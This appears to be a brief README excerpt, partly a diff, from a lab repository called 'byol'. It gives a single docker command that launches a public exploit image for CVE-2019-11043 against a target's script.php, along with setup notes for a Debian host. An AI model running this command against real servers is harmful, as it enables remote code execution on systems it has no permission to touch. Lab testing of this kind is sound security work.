tjkess/byol/README.md

 ### test exploit
 `docker run --rm --net=host ypereirareis/cve-2019-11043 <ip>:8080/script.php`

+Note: this is meant to run on a debian host

 ## steps to create
 * install docker using the script in this repo